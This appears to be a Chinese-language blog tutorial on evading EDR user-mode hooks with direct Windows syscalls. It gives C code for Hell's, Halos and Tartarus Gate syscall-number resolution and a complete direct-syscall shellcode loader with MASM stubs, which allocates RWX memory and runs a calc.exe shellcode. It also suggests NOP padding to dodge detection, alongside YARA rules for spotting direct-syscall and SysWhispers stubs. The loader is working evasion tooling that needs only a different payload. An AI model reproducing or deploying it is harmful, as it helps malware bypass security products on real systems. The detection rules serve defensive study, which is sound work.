Skip to main content

调用syscall实现用户态Hooking绕过

提取 syscall 号码

Hells Gate

Hells Gate 通过 PEB Walking 的方法得到加载的 ntdll 地址以及想要获得 SSN 的函数地址。通过对关键字节的比较来确定这是一个有效的 syscall stub,从而提取出 SSN。其实上个小节我们已经用了这个逻辑了。

原始代码关键部分如下:

if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw); 
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw); 
					pVxTableEntry->wSystemCall = (high << 8) | low;
					break;
}

但是,如果要搜索的函数被 hook 了,那么 SSN 可能不会存在于 syscall stub 里(取决于是什么 EDR 以及覆盖了哪些指令),这样的话,就不能成功获得 ssn 了。因此,Halos Gate 对此进行了改善。


Halos Gate

我们发现,在 ntdll 里,随着地址的增高,NTAPI 的 SSN 是递增的,反之则递减。因此,如果我们想要搜索的 NTAPI 被 hook 了,可以向上和向下同时继续搜索,例如往下搜索了 2 跳发现了一个未被 hook 的 NTAPI,那么要搜索的 NTAPI 的 SSN 就是这个未被 hook 的 NTAPI 的 SSN 再减去 2,即 Desired_SSN = Clean_SSN - Hop

image.png

关键代码部分如下:

int GoUp -32;
int GoDown 32;
// If the first instruction of the syscall is a an inconditional jump (aka it's hooked)
if (*((PBYTE)pFunctionAddress) == 0xe9) {
	// Search beginning pattern of syscall stub through 500 function up and down from our location
	for (WORD index = 1; index <= 500; index++) {
		// Search the begining of a syscall stub in the next function down
		if (*((PBYTE)pFunctionAddress + index * GoDown) == 0x4c
			&& *((PBYTE)pFunctionAddress + 1 + index * GoDown) == 0x8b
			&& *((PBYTE)pFunctionAddress + 2 + index * GoDown) == 0xd1
			&& *((PBYTE)pFunctionAddress + 3 + index * GoDown) == 0xb8
			&& *((PBYTE)pFunctionAddress + 6 + index * GoDown) == 0x00
			&& *((PBYTE)pFunctionAddress + 7 + index * GoDown) == 0x00) {
			BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoDown);
			BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoDown);
			// substract the index from the current syscall identifier to find the one of our target function
			pVxTableEntry->wSystemCall = (high << 8) | low - index;
			return TRUE;
		}
		// Search the begining of a syscall stub in the next function down
		if (*((PBYTE)pFunctionAddress + index * GoUp) == 0x4c
			&& *((PBYTE)pFunctionAddress + 1 + index * GoUp) == 0x8b
			&& *((PBYTE)pFunctionAddress + 2 + index * GoUp) == 0xd1
			&& *((PBYTE)pFunctionAddress + 3 + index * GoUp) == 0xb8
			&& *((PBYTE)pFunctionAddress + 6 + index * GoUp) == 0x00
			&& *((PBYTE)pFunctionAddress + 7 + index * GoUp) == 0x00) {
			BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoUp);
			BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoUp);
			// substract the index from the current syscall identifier to find the one of our target function
			pVxTableEntry->wSystemCall = (high << 8) | low + index;
			return TRUE;
		}
}

代码里定义了最大搜索跳数为 32,搜索时确实需要注意边界。Halos Gate 也有个小局限性,它以第一条指令是否是 jmp 从而判断函数是否被 hook 了。我们之前说了,不同的 EDR 覆盖的指令不同,有的 EDR 覆盖的不是第 1 条指令,可以是 syscall 之前的任何指令。例如 CrowdStrike 覆盖的是第 2 条指令。

image.png


Tartarus Gate

Tartarus Gate 相比 Halos Gate 的改动比较小,主要是考虑了更多 EDR 可能 hook 的情况,例如上面截图所示的情况。对前 4 字节逐一对比,还是相对比较可靠的判断。当然了,hook 导致的指令覆盖可能在 syscall 指令之前的任何字节,如果不放心的话,可以增加更多字节比较。

下面的代码是我个人对动态获取 SSN 的实现:

#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <stdint.h>
#include <string.h>


//Get module handle for ntdll and kernel32 at the same time
void GetModule(HMODULE* ntdll, HMODULE* kernel32)
{
	PPEB peb = (PPEB)(__readgsqword(0x60));
	PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr;
	PLIST_ENTRY ntdlllistentry = *(PLIST_ENTRY*)((PBYTE)ldr + 0x30);
	*ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10);
	PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry);
	PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry);
	*kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10);
}

unsigned char QuickGetSSN(PBYTE pFunctionAddress)
{
	const int maxOffset = 10; // You can adjust this based on your requirements.
	int offset;
	unsigned char ssn_low = -1;
	unsigned char ssn_high = -1;
	unsigned char ssn = -1;
	if (pFunctionAddress[0] == 0x4C && pFunctionAddress[1] == 0x8B && pFunctionAddress[2] == 0xD1 && pFunctionAddress[3] == 0xB8)
	{
		printf("The function is clean\n");
		char ssn = *((unsigned char*)(pFunctionAddress + 4));
		printf("ID of searched function is: 0x%x\n", ssn);	
		return ssn;
	}
	else
	{
		printf("The function is hooked\n");
		// Search both upwards and downwards.
		for (offset = 1; offset <= maxOffset; ++offset)
		{
			// Check upwards.
			PBYTE checkAddress = pFunctionAddress - (0x20 * offset);
			if (checkAddress[0] == 0x4C && checkAddress[1] == 0x8B && checkAddress[2] == 0xD1 && checkAddress[3] == 0xB8)
			{
				ssn_low = *((unsigned char*)(checkAddress + 4));
				ssn_high = *((unsigned char*)(checkAddress + 5));
				ssn = ssn_low * 1 + ssn_high * 16;
				printf("Clean sequence found upwards at offset -0x%x, SSN of the unhooked function is 0x%x\n", offset, ssn);
				printf("SSN of searched NTAPI is 0x%x\n", (offset + ssn));
				return ssn+offset;
			}

			// Check downwards.
			checkAddress = pFunctionAddress + (0x20 * offset);
			if (checkAddress[0] == 0x4C && checkAddress[1] == 0x8B && checkAddress[2] == 0xD1 && checkAddress[3] == 0xB8)
			{
				ssn_low = *((unsigned char*)(checkAddress + 4));
				ssn_high = *((unsigned char*)(checkAddress + 5));
				ssn = ssn_low * 1 + ssn_high * 16;
				printf("Clean sequence found downwards at offset 0x%x, SSN of the unhooked function is 0x%x\n",offset, ssn);
				printf("SSN of searched NTAPI is 0x%x\n", (offset - ssn));
				return ssn-offset;
			}
		}
	}
}

unsigned char GetSSNByName(IN HMODULE hModule, const CHAR* funcName)
{
	PBYTE pBase = (PBYTE)hModule;
	unsigned char ssn_low = -1;
	unsigned char ssn_high = -1;
	unsigned char ssn = -1;
	PIMAGE_DOS_HEADER	pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
	if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE)
		return -1;
	PIMAGE_NT_HEADERS	pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);
	if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
		return -1;

	IMAGE_OPTIONAL_HEADER	ImgOptHdr = pImgNtHdrs->OptionalHeader;
	PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
	PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);
	PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);
	PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);
	for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++)
	{
		CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);
		PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);
		if (_stricmp(funcName, pFunctionName) == 0)
		{
			
			if (pFunctionAddress[0] == 0x4C && pFunctionAddress[1] == 0x8B && pFunctionAddress[2] == 0xD1 && pFunctionAddress[3] == 0xB8)
			{
				printf("NTAPI %s may not be hooked\n", funcName);
				ssn_low = *((unsigned char*)(pFunctionAddress + 4));
				ssn_high = *((unsigned char*)(pFunctionAddress + 5));
				ssn = ssn_low * 1 + ssn_high * 16;
				printf("Syscall number of function %s is: 0x%x\n", pFunctionName,ssn);	//0x18
				return ssn;
			}
			else
			{
				printf("NTAPI %s is hooked, check surrounding functions\n", funcName);
				ssn = QuickGetSSN(pFunctionAddress);
				printf("Syscall number of function %s is: 0x%x\n", pFunctionName, ssn);	//0x18
				return ssn;
			}
			return -1;
		}
	}
	return -1;
}

int main()
{
	HMODULE ntdll;
	HMODULE kernel32;
	GetModule(&ntdll, &kernel32);
	printf("ntdll base address: %p\n", ntdll);
	printf("kernel32 base address: %p\n", kernel32);
	unsigned char ssn =GetSSNByName(ntdll, "NtOpenProcess");
	printf("SSN of the NtOpenProcess is 0x%x\n", ssn);
	return 0;
}

我们人为地给 NtOpenProcess,以及其前向 2 个函数、后向 3 个函数都进行了指令覆盖来模拟 hook。最终,程序成功地发现前向第 3 个函数是没有被 hook 的,提取了其 SSN 后加上 3,得到了 NtOpenProcess 的 SSN。

image.png



直接调用 Syscall


直接 syscall

在 C 源代码文件里定义 NtAllocateVirtualMemory 函数以及所需的结构体,而在 asm 文件里用汇编代码实现函数功能,这里我们实现 NtAllocateVirtualMemory 的 syscall stub 即可。 EXTERN_C 宏允许链接器将该函数定义与汇编代码链接起来,需要保持名称相同。这样,我们就能像调用一般函数一样调用定义的汇编函数了。

EXTERN_C NTSTATUS NtAllocateVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PSIZE_T RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect);
.code
<...SNIP...>

NtAllocateVirtualMemory PROC
    mov r10, rcx
    mov rax, 18h
    syscall
    ret
NtAllocateVirtualMemory ENDP

<...SNIP...>
end

以此类推,我们接着去定义其他所需的函数,例如 NtWriteVirtualMemory,NtCreateThreadEx,NtWaitForSingleObject,NtClose 等。因为这些 NTAPI 大都没有微软官方的文档,因此我们需要借助搜索引擎参考已有项目对其的用法。完成后的代码如下:

DirectSyscall.c 代码

#include <stdio.h>
#include <Windows.h>

typedef struct _PS_ATTRIBUTE
{
	ULONG  Attribute;
	SIZE_T Size;
	union
	{
		ULONG Value;
		PVOID ValuePtr;
	} u1;
	PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _UNICODE_STRING
{
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
	ULONG           Length;
	HANDLE          RootDirectory;
	PUNICODE_STRING ObjectName;
	ULONG           Attributes;
	PVOID           SecurityDescriptor;
	PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _PS_ATTRIBUTE_LIST
{
	SIZE_T       TotalLength;
	PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

EXTERN_C NTSTATUS NtAllocateVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PSIZE_T RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect);

EXTERN_C NTSTATUS NtWriteVirtualMemory(
	IN HANDLE ProcessHandle,
	IN PVOID BaseAddress,
	IN PVOID Buffer,
	IN SIZE_T NumberOfBytesToWrite,
	OUT PSIZE_T NumberOfBytesWritten OPTIONAL);

EXTERN_C NTSTATUS NtCreateThreadEx(
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN HANDLE ProcessHandle,
	IN PVOID StartRoutine,
	IN PVOID Argument OPTIONAL,
	IN ULONG CreateFlags,
	IN SIZE_T ZeroBits,
	IN SIZE_T StackSize,
	IN SIZE_T MaximumStackSize,
	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);

EXTERN_C NTSTATUS NtWaitForSingleObject(
	IN HANDLE ObjectHandle,
	IN BOOLEAN Alertable,
	IN PLARGE_INTEGER TimeOut OPTIONAL);

EXTERN_C NTSTATUS NtClose(
	IN HANDLE Handle);


int main() {
    // calc.exe shellcode
    unsigned char code[] = "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x28\xff\xd0";


    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(code);
    HANDLE hThread;
    NTSTATUS status;

    allocation_start = nullptr;


    // Allocate Virtual Memory 
	if (NtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)==0)
		printf("Memory allocated at %p\n", allocation_start);
	else
		printf("Allocated failed, Error code is %d\n",GetLastError());

    // Copy shellcode into allocated memory
	if (NtWriteVirtualMemory(GetCurrentProcess(), allocation_start, code, sizeof(code), 0)==0)
		printf("Copied successfully\n");
	else
		printf("Copied failed, Error code is %d\n", GetLastError());


	if (NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL)==0)
		printf("Executed successfully\n");
	else
		printf("Executed failed, Error code is %d\n", GetLastError());

    // Wait for the end of the thread and close the handle
    NtWaitForSingleObject(hThread, FALSE, NULL);
    NtClose(hThread);

    return 0;
}

stub.asm 代码

.code

NtAllocateVirtualMemory PROC
    mov r10, rcx
    mov rax, 18h
    syscall
    ret
NtAllocateVirtualMemory ENDP

NtWriteVirtualMemory PROC
    mov r10, rcx
    mov rax, 3Ah
    syscall
    ret
NtWriteVirtualMemory ENDP

NtCreateThreadEx PROC
    mov r10, rcx
    mov rax, 0C2h
    syscall
    ret
NtCreateThreadEx ENDP

NtWaitForSingleObject PROC
    mov r10, rcx
    mov rax, 4
    syscall
    ret
NtWaitForSingleObject ENDP

NtClose PROC
    mov r10, rcx
    mov rax, 0Fh
    syscall
    ret
NtClose ENDP


end

为了能编译 masm 文件,我们右键项目,选择 Build Dependencies -> Build Customizations,勾选 masm

image.png

右键 asm 代码文件选择属性,General -> Item Type 选项选择 Microsoft Macro Assembler

image.png

这样我们便能编译项目里的 masm 代码了。编译后运行程序,我们发现 shellcode 得以成功运行。

image.png

不过直接 syscall 调用的弊端也是比较显著的,汇编函数在编译后成为操作码存在于程序的代码区,汇编代码与操作码是可预测的一一对应的关系。因此,如果没有对 syscall stub 进行混淆的话,我们可以用如下 yara 规则来检测包含直接 syscall 调用的程序:

rule direct_syscall
{
    meta:
        description = "Hunt for direct syscall"

    strings:
        $s1 = {4c 8b d1 48 c7 c0 ?? ?? ?? ?? 0f 05 c3}
        $s2 = {4C 8b d1 b8 ?? ?? ?? ?? 0F 05 C3}
    condition:
        #s1 >=1 or #s2 >=1
}

我们定义了 5 个 syscall stub,都被检测到了。我们可以插入一些 NOP 类(即无实际意义、不影响运行结果) 的指令用于混淆 syscall stub。

image.png

此外,从调用栈的视角,是我们程序的某一函数发起了 syscall,而不是 ntdll 空间内的 NTAPI,这是非常可疑的。

image.png

 

syswhisper 1&2


rule syswhisper2
{
    meta:
        description = "Hunt for syswhisper2 generated asm code"

    strings:
        $s1 = {58 48 89 4C 24 08 48 89 54 24 10 4C 89 44 24 18 4C 89 4C 24 20 48 83 EC 28 8B 0D B1 3C 00 00 E8 ?? ?? ?? ?? 48 83 C4 28 48 8B 4C 24 08 48 8B 54 24 10 4C 8B 44 24 18 4C 8B 4C 24 20 4C 8B D1 0F 05 C3}
    condition:
        #s1 >=1 
}

 


间接调用 Syscall


间接 syscall 调用




syswhisper 3

rule syswhisper3
{
    meta:
        description = "Hunt for syswhispe3 generated asm code"

    strings:
        $s1 = {48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 48 83 ec 28 b9 ?? ?? ?? ?? e8}
        $s2 = {48 83 c4 28 48 8b 4c 24 08 48 8b 54 24 10 4c 8b 44 24 18 4c 8b 4c 24 20 4c 8b d1}
    condition:
        #s1 >=1 or #s2 >=1 
}



MutationGate


image.png

image.png